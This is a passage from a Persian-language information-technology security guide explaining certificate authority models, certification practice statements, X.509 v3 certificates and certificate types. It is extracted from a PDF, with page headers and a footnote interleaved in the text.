‫ﺑﻜﺎﺭ ﺭﻭﻧﺪ‪ ،‬ﻣﺸﺎﺑﻪ ﻣﺜﺎﻝ ﺩﺍﻧﺸﮕﺎﻩ ﻛﻪ ﭘﻴﺸﺘﺮ ﺫﻛﺮ ﺷﺪ‪ .‬ﺑﻪ ﺭﻭﺷﻬﺎﻱ ﻣﺘﻔﺎﻭﺗﻲ ﻣﻲﺗﻮﺍﻥ ﺍﺯ ﺧﺪﻣﺎﺕ ﻳﻚ ﻣﺮﻛﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺍﺳﺘﻔﺎﺩﻩ ﮐﺮﺩ‪:‬‬

‫ﻣﺮﮐﺰ ﺩﺍﺧﻠﻲ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ‬


‫ﻳﻚ ﺳﺎﺯﻣﺎﻥ ﻣﻲﺗﻮﺍﻧﺪ ﺍﺯ ﻳﻚ ﻣﺮﮐﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺑﺮﺍﻱ ﺗﺄﻳﻴﺪ ﺷﺎﻏﻠﻴﻦ ﺧﻮﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﺪ‪ .‬ﮔﻮﺍﻫﻲﻫﺎﻳﻲ ﻛـﻪ ﺑﻮﺳـﻴﻠﺔ ﻳـﻚ ﻣﺮﮐـﺰ ﺩﺍﺧﻠـﻲ‬
‫ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﻣﻨﺘﺸﺮ ﻣﻲﺷﻮﺩ ﻣﻲﺗﻮﺍﻧﺪ ﻧﺎﻡ‪ ،‬ﻣﻮﻗﻌﻴﺖ‪ ،‬ﻭ ﺳﻄﺢ ﺍﺧﺘﻴﺎﺭ ﻳﻚ ﻓﺮﺩ ﺭﺍ ﻣﺸﺨﺺ ﺳﺎﺯﺩ‪ .‬ﺍﻳـﻦ ﮔـﻮﺍﻫﻲﻫـﺎ ﻣـﻲﺗﻮﺍﻧﻨـﺪ ﺩﺭ ﺩﺍﺧـﻞ‬
‫ﺳﺎﺯﻣﺎﻥ ﺑﺮﺍﻱ ﻛﻨﺘﺮﻝ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﻣﻨﺎﺑﻊ ﺩﺍﺧﻠﻲ ﻭ ﮔﺮﺩﺵ ﺍﻃﻼﻋﺎﺕ ﺑﻜﺎﺭ ﺭﻭﻧﺪ‪ .‬ﺍﻳﻦ ﻣﺮﮐﺰ ﺩﺍﺧﻠﻲ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﻣﻲﺗﻮﺍﻧـﺪ ﭘﺎﻳـﻪﺍﻱ ﺑـﺮﺍﻱ‬
‫ﺯﻳﺮﺳﺎﺧﺖ ﮐﻠﻴﺪ ﻋﻤﻮﻣﻲ ﺳﺎﺯﻣﺎﻥ ﺑﺎﺷﺪ‪.‬‬

‫ﺷﺮﻛﺘﻬﺎ ﻫﻤﭽﻨﻴﻦ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺍﺯ ﻳﻚ ﻣﺮﮐﺰ ﺩﺍﺧﻠﻲ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﻛﻪ ﺑﺮﺍﻱ ﻣﺸﺘﺮﻳﺎﻥ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﻣﻲﻛﻨﺪ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨـﺪ‪ .‬ﺑﻌﻨـﻮﺍﻥ ﻣﺜـﺎﻝ‪،‬‬
‫ﭼﻨﺪ ﺗﺎﻻﺭ ﺑﻮﺭﺱ ﻣﺸﺘﺮﻳﺎﻥ ﺧﻮﺩ ﺭﺍ ﻣﺠﺒﻮﺭ ﻛﺮﺩﻧﺪ ﺑﺮﺍﻱ ﺁﻧﻜﻪ ﺍﺟﺎﺯﻩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ ﺍﺯ ﻃﺮﻳﻖ ﺍﻳﻨﺘﺮﻧـﺖ ﺑـﻪ ﺩﺍﺩ ﻭ ﺳـﺘﺪﻫﺎﻱ ﭘﺮﺑﻬـﺎ ﺑﭙﺮﺩﺍﺯﻧـﺪ‪،‬‬
‫ﮔﻮﺍﻫﻲﻫﺎﻱ ﻻﺯﻡ ﺭﺍ ﺩﺭﻳﺎﻓﺖ ﻛﻨﻨﺪ‪.‬‬

‫ﻣﺮﮐﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺑﺮﻭﻧﺴﭙﺎﺭﻱﺷﺪﻩ‬


‫ﻳﻚ ﺳﺎﺯﻣﺎﻥ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺨﻮﺍﻫﺪ ﻛﻪ ﺩﺭ ﻣﺰﺍﻳﺎﻱ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻣﺠﻮﺯﻫﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﺳﻬﻴﻢ ﺑﺎﺷﺪ‪ ،‬ﺍﻣﺎ ﺗﻮﺍﻧﺎﻳﻲ ﺗﻜﻨﻴﻜﻲ ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﺁﻧﺮﺍ ﻧﺪﺍﺷﺘﻪ‬
‫ﺑﺎﺷﺪ‪ .‬ﭼﻨﻴﻦ ﺳﺎﺯﻣﺎﻧﻲ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺎ ﻳﻚ ﺳﺎﺯﻣﺎﻥ ﺧﺎﺭﺟﻲ ﻗﺮﺍﺭﺩﺍﺩ ﺑﺒﻨﺪﺩ ﺗﺎ ﺧﺪﻣﺎﺕ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺭﺍ ﺑﺮﺍﻱ ﺷﺎﻏﻠﻴﻦ ﻭ ﻣﺸﺘﺮﻳﺎﻧﺶ ﻓﺮﺍﻫﻢ ﻛﻨﺪ‪،‬‬
‫ﺩﺭﺳﺖ ﻣﺜﻞ ﺷﺮﻛﺘﻲ ﻛﻪ ﺑﺮﺍﻱ ﺻﺪﻭﺭ ﻛﺎﺭﺗﻬﺎﻱ ﺷﻨﺎﺳﺎﻳﻲ ﺑﺎ ﻳﻚ ﻣﺮﻛﺰ ﭼﺎﭖ ﻋﻜﺲ ﻗﺮﺍﺭﺩﺍﺩ ﻣﻲﺑﻨﺪﺩ‪.‬‬

‫ﻣﺮﮐﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺷﺨﺺ ﺛﺎﻟﺚ ﻣﻄﻤﺌﻦ‬


‫ﻳﻚ ﺷﺮﻛﺖ ﻳﺎ ﺳﺎﺯﻣﺎﻥ ﺩﻭﻟﺘﻲ ﻣﻲﺗﻮﺍﻧﺪ ﺍﺯ ﻳﻚ ﻣﺮﮐﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺷﺨﺺ ﺛﺎﻟﺚ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﺪ ﺗﺎ ﻛﻠﻴﺪﻫﺎﻱ ﻋﻤﻮﻣﻲ ﺭﺍ ﺑﻪ ﺍﺳﺎﻣﻲ ﻗـﺎﻧﻮﻧﻲ‬
‫ﺍﻓﺮﺍﺩ ﻭ ﺷﺮﻛﺘﻬﺎ ﭘﻴﻮﻧﺪ ﺩﺍﺩﻩ ﺑﺎﺷﺪ‪ .‬ﺍﻳﻦ ﻣﺮﮐﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻪ ﺍﻓﺮﺍﺩﻱ ﻛﻪ ﺑﺎ ﻳﻜﺪﻳﮕﺮ ﻫﻴﭻ ﺭﺍﺑﻄﻪ ﻗﺒﻠﻲ ﻧﺪﺍﺷﺘﻪﺍﻧﺪ ﺍﺟﺎﺯﻩ ﺩﻫـﺪ ﻛـﻪ‬
‫ﻫﺮﻳﮏ ﻫﻮﻳﺖ ﺧﻮﺩ ﺭﺍ ﺑﺮﺍﻱ ﺩﻳﮕﺮﻱ ﺗﺼﺪﻳﻖ ﻛﻨﻨﺪ ﻭ ﺑﻪ ﻣﻌﺎﻣﻼﺕ ﻗﺎﻧﻮﻧﻲ ﺑﭙﺮﺩﺍﺯﻧﺪ‪ .‬ﮔﻮﺍﻫﻲﻫﺎﻳﻲ ﻛﻪ ﺑﻮﺳـﻴﻠﺔ ﻳـﻚ ﻣﺮﻛـﺰ ﺟﻬـﺎﻧﻲ ﺻـﺪﻭﺭ‬
‫ﮔﻮﺍﻫﻲ ﺻﺎﺩﺭ ﻣﻲﺷﻮﻧﺪ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺎ ﮔﻮﺍﻫﻴﻨﺎﻣﻪﻫﺎﻱ ﺭﺍﻧﻨﺪﮔﻲ ﻭ ﻛﺎﺭﺗﻬﺎﻱ ﺷﻨﺎﺳﺎﻳﻲ ﻛﻪ ﺗﻮﺳﻂ ﻳﻚ ﺩﻭﻟﺖ ﺻﺎﺩﺭ ﻣﻲﺷﻮﺩ ﺑﺮﺍﺑﺮﻱ ﻛﻨﻨﺪ‪.‬‬
‫ﺑﺮﺍﻱ ﺁﻧﻜﻪ ﺑﺘﻮﺍﻧﻴﺪ ﺍﺯ ﮔﻮﺍﻫﻲﻫﺎﻱ ﺻﺎﺩﺭ ﺷﺪﻩ ﺑﻮﺳﻴﻠﺔ ﻳﻚ ﻣﺮﮐﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ‪ ،‬ﺑﺎﻳﺪ ﻳﻚ ﻧﺴﺨﻪ ﺍﺯ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﺁﻥ ﻣﺮﮐﺰ ﺭﺍ‬
‫ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ‪ .‬ﻛﻠﻴﺪﻫﺎﻱ ﻋﻤﻮﻣﻲ ﺑﺎ ﮔﻮﺍﻫﻲﻫﺎﻱ ﻣﺨﺼﻮﺹ ﺑﻪ ﺧﻮﺩﺷﺎﻥ ﺻﺎﺩﺭ ﻣﻲﺷﻮﻧﺪ‪ .‬ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ ﺑﻴﺸﺘﺮ ﺍﻳﻦ ﻣﺠﻮﺯﻫﺎ ﺩﺭ ﻣﺮﻭﺭﮔﺮ ﻭﺏ‬
‫ﻭ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎ ﺍﺯ ﭘﻴﺶ ﻗﺮﺍﺭﺩﺍﺩﻩ ﺷﺪﻩﺍﻧﺪ‪ .‬ﻛﻠﻴﺪﻫﺎﻱ ﻋﻤﻮﻣﻲ ﻣﺮﺍﮐﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﻄﻮﺭ ﺩﺳﺘﻲ ﻫﻢ ﺗﻮﺳﻂ ﻛﺎﺭﺑﺮ ﻧﻬـﺎﻳﻲ ﺍﺿـﺎﻓﻪ‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‬

‫ﺷﻮﻧﺪ‪.‬‬
‫ﻭﺍﺿﺢ ﺍﺳﺖ ﻛﻪ ﺁﻧﺪﺳﺘﻪ ﺍﺯ ﻣﺮﺍﮐﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﻛﻪ ﻛﻠﻴﺪﻫﺎﻱ ﺁﻧﻬﺎ ﺍﺯ ﻗﺒﻞ ﺩﺭ ﻣﺮﻭﺭﮔﺮﻫﺎﻱ ﻭﺏ ﻳﺎ ﺳﻴـﺴﺘﻢﻋﺎﻣـﻞ ﻗـﺮﺍﺭ ﺩﺍﺩﻩ ﻧـﺸﺪﻩ ﺿـﺮﺭ‬
‫ﻛﺮﺩﻩﺍﻧﺪ‪ .‬ﺍﮔﺮﭼﻪ ‪ Microsoft‬ﻭ ‪ Netscape‬ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ ﺩﺭﻫﺎﻱ ﻣﺮﻭﺭﮔﺮﻫﺎﻱ ﺧﻮﺩ ﺭﺍ ﺑﻪ ﺭﻭﻱ ﻫﺮ ﻣﺮﮐﺰ ﺻـﺪﻭﺭ ﮔـﻮﺍﻫﻲ ﻛـﻪ ﺑﺘﻮﺍﻧـﺪ‬
‫ﻻﺯﻣﻪﻫﺎﻱ ﺗﺼﺪﻳﻖ ﺁﻧﻬﺎ ﺭﺍ ﺑﺮﺁﻭﺭﺩﻩ ﺳﺎﺯﺩ ﻣﻲﮔﺸﺎﻳﻨﺪ‪ ،‬ﺍﻣﺎ ﻣﺮﻭﺭﮔﺮﻫﺎﻱ ﺍﺻﻠﻲ ﻭﺏ ﺑﺎ ﺗﻌﺪﺍﺩ ﻣﺤﺪﻭﺩﻱ ﺍﺯ ﻛﻠﻴﺪﻫﺎﻱ ‪ CA‬ﻛﻪ ﺑﻪ ﺩﻗﺖ ﺍﻧﺘﺨﺎﺏ‬
‫ﺷﺪﻩﺍﻧﺪ ﺗﻮﺯﻳﻊ ﮔﺸﺘﻪﺍﻧﺪ‪ .‬ﻗﺮﺍﺭ ﺩﺍﺩﻥ ﺍﻳﻦ ﻛﻠﻴﺪﻫﺎ ﺩﺭ ﺁﻥ ﺑﺮﻧﺎﻣﻪﻫﺎ ﺍﻣﺘﻴﺎﺯ ﺑﺰﺭﮔﻲ ﺑﺮﺍﻱ ﻣﺮﺍﮐﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﻣﻨﺘﺸﺮﻛﻨﻨﺪﺓ ﺁﻧﻬﺎ ﻭ ﻣـﺎﻧﻌﻲ ﺑـﺮﺍﻱ‬
‫ﺳﺎﻳﺮﻳﻦ ﺑﻮﺩ‪.‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٣٢٢‬‬

‫ﺳﻴﺎﺳﺖ ﻛﺎﺭﺑﺮﺩ ﮔﻮﺍﻫﻲ )‪(CPS‬‬

‫ﺳﻴﺎﺳﺖ ﮐﺎﺭﺑﺮﺩ ﮔﻮﺍﻫﻲ )‪ ١٣٧(CPS‬ﻳﻚ ﺳﻨﺪ ﻗﺎﻧﻮﻧﻲ ﺍﺳﺖ ﻛﻪ ﻣﺮﮐﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺁﻧﺮﺍ ﻣﻨﺘﺸﺮ ﻣﻲﻛﻨﺪ ﻭ ﺗﻮﺻﻴﻒﻛﻨﻨـﺪﻩ ﺧـﻂﻣـﺸﻲﻫـﺎ ﻭ‬
‫ﻓﺮﺍﻳﻨﺪﻫﺎ ﺑﺮﺍﻱ ﺻﺪﻭﺭ ﻭ ﺍﺑﻄﺎﻝ ﮔﻮﺍﻫﻲﻫﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﺍﺳﺖ‪ CPS .‬ﻣﺮﺑﻮﻁ ﺑﻪ ﻳﻚ ﻣﺮﮐﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺭﻭﺷﻦ ﻣﻲﻛﻨﺪ ﻛﻪ ﻣﻔﻬـﻮﻡ ﺗﺄﻳﻴـﺪ‬
‫ﻳﻚ ﻛﻠﻴﺪ ﺗﻮﺳﻂ ﺁﻥ ﻣﺮﻛﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﭼﻴﺴﺖ‪.‬‬
‫ﺍﺳﻨﺎﺩ ‪ CPS‬ﻃﺮﺍﺣﻲ ﺷﺪﻩﺍﻧﺪ ﻛﻪ ﺗﻮﺳﻂ ﺍﻧﺴﺎﻥ ﻭ ﻧﻪ ﻣﺎﺷﻴﻦ ﺧﻮﺍﻧﺪﻩ ﺷﻮﻧﺪ‪ .‬ﻳﻚ ﺷﺮﻛﺖ ﺗﺠﺎﺭﻱ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺨﻮﺍﻫﺪ ﮔﻮﺍﻫﻲ ﻳـﻚ ﻣﺮﮐـﺰ‬
‫ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺭﺍ ﺑﭙﺬﻳﺮﺩ ﻛﻪ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺣﺪﺍﻗﻠﻲ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺭﺍ ﺿﻤﺎﻧﺖ ﻣﻲﻛﻨﺪ ﻭ ﻓﺮﺽ ﺭﺍ ﺑﺮ ﺳﻄﺢ ﻣﻌﻴﻨـﻲ ﺍﺯ ﺗﻌﻬـﺪ ﺩﺭ ﻗﺒـﺎﻝ ﺩﻧﺒـﺎﻝ‬
‫ﻧﺸﺪﻥ ﺧﻂ ﻣﺸﻲﻫﺎﻱ ﮔﻮﺍﻫﻲ ﺑﮕﺬﺍﺭﺩ ‪ -‬ﻭ ﺑﺨﻮﺍﻫﺪ ﻛﻪ ﻣﺮﮐﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺗﻮﺳﻂ ﻳﻚ ﺳﺎﺯﻣﺎﻥ ﻣﻌﺘﺒﺮ ﺗﻀﻤﻴﻦ ﺷﺪﻩ ﺑﺎﺷﺪ‪.‬‬

‫ﮔﻮﺍﻫﻲ ‪X.509 v3‬‬

‫ﺍﮔﺮﭼﻪ ﻣﺮﺍﻛﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﻣﻲﺗﻮﺍﻧﻨﺪ ﻫﺮ ﻧﻮﻋﻲ ﮔﻮﺍﻫﻲ ﺻﺎﺩﺭ ﻛﻨﻨﺪ‪ ،‬ﺍﻣﺎ ﺩﺭ ﻋﻤﻞ ﺑﻴﺸﺘﺮ ﺁﻧﻬﺎ ﮔـﻮﺍﻫﻲﻫـﺎﻳﻲ ﺻـﺎﺩﺭ ﻣـﻲﻛﻨﻨـﺪ ﻛـﻪ ﻃﺒـﻖ‬
‫ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ‪ X.509 v3‬ﻫﺴﺘﻨﺪ‪ .‬ﻣﺸﺎﺑﻪ ﺍﻳﻦ ﻣﺴﺌﻠﻪ‪ ،‬ﺑﻴﺸﺘﺮ ﺑﺮﻧﺎﻣـﻪﻫـﺎ ﻭ ﭘﺮﻭﺗﻜﻠﻬـﺎﻱ ﺭﻣﺰﻧﮕـﺎﺭﻱ ﺍﺯ ﺟﻤﻠـﻪ ‪ SSL‬ﺗﻨﻬـﺎ ﺑـﺮﺍﻱ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ‬
‫ﻣﺠﻮﺯﻫﺎﻱ ‪ X.509 v3‬ﻃﺮﺍﺣﻲ ﺷﺪﻩﺍﻧﺪ‪ .‬ﺗﻨﻬﺎ ﺍﺳﺘﺜﻨﺎﺀ ﻣﻬﻢ ﺩﺭ ﺍﻳﻨﺠﺎ ‪ PGP‬ﺍﺳﺖ‪ ،‬ﻛﻪ ﺍﺯ ﻗﺎﻟﺐ ﮔﻮﺍﻫﻲ ﻣﺨـﺼﻮﺹ ﺑـﻪ ﺧـﻮﺩﺵ ﺍﺳـﺘﻔﺎﺩﻩ‬
‫ﻣﻲﻛﻨﺪ‪ ،‬ﺍﮔﺮﭼﻪ ﻧﺴﺨﻪﻫﺎﻱ ﺍﺧﻴﺮ ﺁﻥ ﺑﻌﻀﻲ ﺍﺯ ﻣﺠﻮﺯﻫﺎﻱ ‪ X.509‬ﺭﺍ ﻧﻴﺰ ﭘﺸﺘﻴﺒﺎﻧﻲ ﻣﻲﻛﻨﻨﺪ‪) .‬ﺑﺮﻧﺎﻣـﻪ ‪ SSH‬ﺍﺯ ﻣﺠﻮﺯﻫـﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﻧﻤـﻲﻛﻨـﺪ‪ ،‬ﺍﻣـﺎ‬
‫ﺩﺭﻋﻮﺽ ﻣﺘﻜﻲ ﺑﻪ ﺗﺄﻳﻴﺪ ﺷﺨﺼﻲ ﻛﻠﻴﺪ ﺗﻮﺳﻂ ﻛﺎﺭﺑﺮﺍﻥ ﺍﺳﺖ‪(.‬‬
‫ﻫﺮ ﮔﻮﺍﻫﻲ ‪ X.509‬ﺷﺎﻣﻞ ﻳﻚ ﺷﻤﺎﺭﺓ ﻧﺴﺨﻪ‪ ،‬ﺷﻤﺎﺭﺓ ﺳﺮﻳﺎﻝ‪ ،‬ﺍﻃﻼﻋﺎﺕ ﺷﻨﺎﺳﺎﻳﻲ‪ ،‬ﺍﻃﻼﻋـﺎﺕ ﻣﺮﺑـﻮﻁ ﺑـﻪ ﺍﻟﮕـﻮﺭﻳﺘﻢ‪ ،‬ﻭ ﺍﻣـﻀﺎﻱ ﻣﺮﻛـﺰ‬
‫ﺻﺎﺩﺭﻛﻨﻨﺪﺓ ﮔﻮﺍﻫﻲ ﺍﺳﺖ‪ .‬ﺻﻨﻌﺖ ﺑﺠﺎﻱ ﮔﻮﺍﻫﻲﻫﺎﻱ ﺍﻭﻟﻴﻪ ‪ ،X.509‬ﮔﻮﺍﻫﻲﻫﺎﻱ ‪ X.509 v3‬ﺭﺍ ﺑﺮﮔﺰﻳﺪ‪ ،‬ﭼـﻮﻥ ﺍﺳـﺘﺎﻧﺪﺍﺭﺩ ‪X.509 v3‬‬
‫ﺍﺟﺎﺯﻩ ﻣﻲﺩﺍﺩ ﻛﻪ "ﻧﺎﻡ" ﻭ "ﻣﻘﺪﺍﺭ" ﺩﻟﺨﻮﺍﻩ ﺑﺘﻮﺍﻧﻨﺪ ﻣﺸﻤﻮﻝ ﮔﻮﺍﻫﻲ ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﺷﻮﻧﺪ‪ .‬ﺍﻳﻦ ﺩﻭ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑـﺮﺍﻱ ﺍﻫـﺪﺍﻑ ﺑـﺴﻴﺎﺭﻱ ﺑﻜـﺎﺭ ﺭﻭﻧـﺪ ﻭ‬
‫ﺑﺎﻋﺚ ﺷﻮﻧﺪ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﮔﻮﺍﻫﻲﻫﺎ ﺑﺪﻭﻥ ﺗﻐﻴﻴﺮ ﭘﺮﻭﺗﻜﻞ ﻣﺮﺑﻮﻃﻪ ﮔﺴﺘﺮﺵ ﻳﺎﺑﺪ‪.‬‬

‫ﺍﻧﻮﻉ ﮔﻮﺍﻫﻲﻫﺎ‬
‫ﺩﺭ ﺍﻳﻨﺘﺮﻧﺖ ﺍﻣﺮﻭﺯ ﭼﻬﺎﺭ ﻧﻮﻉ ﻣﺠﻮﺯ ﺩﻳﺠﻴﺘﺎﻟﻲ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺳﺖ‪:‬‬

‫ﮔﻮﺍﻫﻲﻫﺎﻱ ﻣﺮﺍﻛﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ‬


‫ﻻ‬
‫ﺍﻳﻦ ﻣﺠﻮﺯﻫﺎ ﺷﺎﻣﻞ ﻛﻠﻴﺪﻫﺎﻱ ﻋﻤﻮﻣﻲ ﻭ ﻧﺎﻡ ﻣﺮﺍﻛﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﻳﺎ ﻧﺎﻡ ﺧﺪﻣﺎﺕ ﺧﺎﺻﻲ ﺍﺳﺖ ﻛﻪ ﺑﺮﺍﻱ ﺁﻥ ﮔﻮﺍﻫﻲ ﺻﺎﺩﺭ ﻣﻲﺷﻮﺩ‪ .‬ﻣﻌﻤﻮ ﹰ‬
‫ﺍﻳﻦ ﻣﺠﻮﺯﻫﺎ "ﺧﻮﺩ ﺍﻣﻀﺎ" ﻫﺴﺘﻨﺪ ‪ -‬ﻳﻌﻨﻲ ﺑﺎ ﻛﻠﻴﺪ ﺧﺼﻮﺻﻲ ﺧﻮﺩ ‪ CA‬ﺍﻣﻀﺎ ﺷﺪﻩﺍﻧﺪ‪ .‬ﻣﺮﺍﻛﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﻫﻤﭽﻨﻴﻦ ﻣـﻲﺗﻮﺍﻧﻨـﺪ ﺑـﺼﻮﺭﺕ‬
‫ﺯﻧﺠﻴﺮﻩﺍﻱ ﺍﻋﻄﺎﻱ ﮔﻮﺍﻫﻲ ﻛﻨﻨﺪ ﻳﺎ ﻛﻠﻴﺪﻫﺎﻱ ﻳﻜﺪﻳﮕﺮ ﺭﺍ ﺍﻣﻀﺎ ﻧﻤﺎﻳﻨﺪ‪ .‬ﺍﻳﻨﻜﻪ ﺍﻳﻦ ﮔﻮﺍﻫﻲﻫﺎﻱ ﺯﻧﺠﻴﺮﻩﺍﻱ ﻭﺍﻗﻌﹰﺎ ﭼﻪ ﻣﻔﻬﻮﻣﻲ ﺧﻮﺍﻫﻨﺪ ﺩﺍﺷﺖ‬
‫ﻫﻤﭽﻨﺎﻥ ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﺳﺆﺍﻝ ﻣﻄﺮﺡ ﺍﺳﺖ‪ .‬ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ‪Netscape ،Microsoft Internet Explorer ،Microsoft Windows‬‬
‫‪ ،Navigator‬ﻭ ‪ ،open SSL‬ﻫﻤﻪ ﺑﻪ ﻫﻤﺮﺍﻩ ﺑﻴﺶ ﺍﺯ ﺩﻩ ﮔﻮﺍﻫﻲ ﺍﺯ ﻣﺮﺍﮐﺰ ﻣﺨﺘﻠﻒ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺩﺭ ﺑﺎﺯﺍﺭ ﺗﻮﺯﻳﻊ ﺷﺪﻩﺍﻧﺪ‪.‬‬
‫ﺩﺭ ﻓﻬﺮﺳﺖ ‪CA‬ﻫﺎﻳﻲ ﻛﻪ ﻫﻤﺮﺍﻩ ﻣﺮﻭﺭﮔﺮﻫﺎﻱ ﻭﺏ ﺗﻮﺯﻳﻊ ﺷﺪﻩﺍﻧﺪ ﺷﺮﻛﺘﻬﺎﻱ ﻣﺘﻌﺪﺩﻱ ﺑﻴﺶ ﺍﺯ ﻳﻚ ﮔﻮﺍﻫﻲ ﺩﺍﺭﻧﺪ‪ VerSign .‬ﺑﺎ ﺑـﻴﺶ ﺍﺯ‬
‫‪ ۲۰‬ﮔﻮﺍﻫﻲ ﻣﺨﺘﻠﻒ ﺑﻴﺸﺘﺮﻳﻦ ﺗﻌﺪﺍﺩ ﮔﻮﺍﻫﻲﻫﺎ ﺭﺍ ﺩﺍﺭﺩ‪ .‬ﺍﻣﻀﺎﻫﺎﻱ ﺍﻧﺠﺎﻡﺷﺪﻩ ﺑﻮﺳﻴﻠﺔ ﻛﻠﻴﺪﻫﺎﻱ ﺧﺼﻮﺻﻲ ﻣﺘﻔﺎﻭﺕ ﺑﻴـﺎﻧﮕﺮ ﺳـﻄﻮﺡ ﻣﺨﺘﻠـﻒ‬
‫ﺍﻃﻤﻴﻨﺎﻥ ﻭ ﺍﻋﺘﺒﺎﺭ ﻫﺴﺘﻨﺪ‪.‬‬

‫ﮔﻮﺍﻫﻲﻫﺎﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ‬
‫ﺍﻳﻦ ﻣﺠﻮﺯﻫﺎ ﺷﺎﻣﻞ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﻳﻚ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ‪ ،SSL‬ﻧـﺎﻡ ﺳـﺎﺯﻣﺎﻧﻲ ﻛـﻪ ﺁﻥ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﻩ ﺭﺍ ﺍﺟـﺮﺍ ﻣـﻲﻛﻨـﺪ‪ ،‬ﻭ ﻧـﺎﻡ ‪DNS‬‬
‫ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺍﺳﺖ‪ .‬ﻫﺮ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﺍﻃﻼﻋﺎﺕ ﺑﺎ ﻗﺎﺑﻠﻴﺖ ﺭﻣﺰﻧﮕﺎﺭﻱ ﺩﺭ ﺍﻳﻨﺘﺮﻧﺖ ﺑﺎﻳﺪ ﻳﻚ ﮔـﻮﺍﻫﻲ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﻩ ﺑـﺮﺍﻱ ﭘﺮﻭﺗﻜـﻞ‬
‫ﺭﻣﺰﻧﮕﺎﺭﻱ ‪ SSL‬ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﺗﺎ ﺑﺘﻮﺍﻧﺪ ﺑﺪﺭﺳﺘﻲ ﻋﻤﻞ ﻛﻨﺪ‪ .‬ﺍﮔﺮﭼﻪ ﻫﺪﻑ ﺍﺻﻠﻲ ﺻﺪﻭﺭ ﺍﻳﻦ ﮔﻮﺍﻫﻲﻫﺎ ﻛﻤﻚ ﺑـﻪ ﻣـﺸﺘﺮﻳﺎﻥ ﺩﺭ ﺗـﺸﺨﻴﺺ‬

‫‪137 Certification Practices Statement‬‬


‫‪٣٢٣‬‬ ‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬

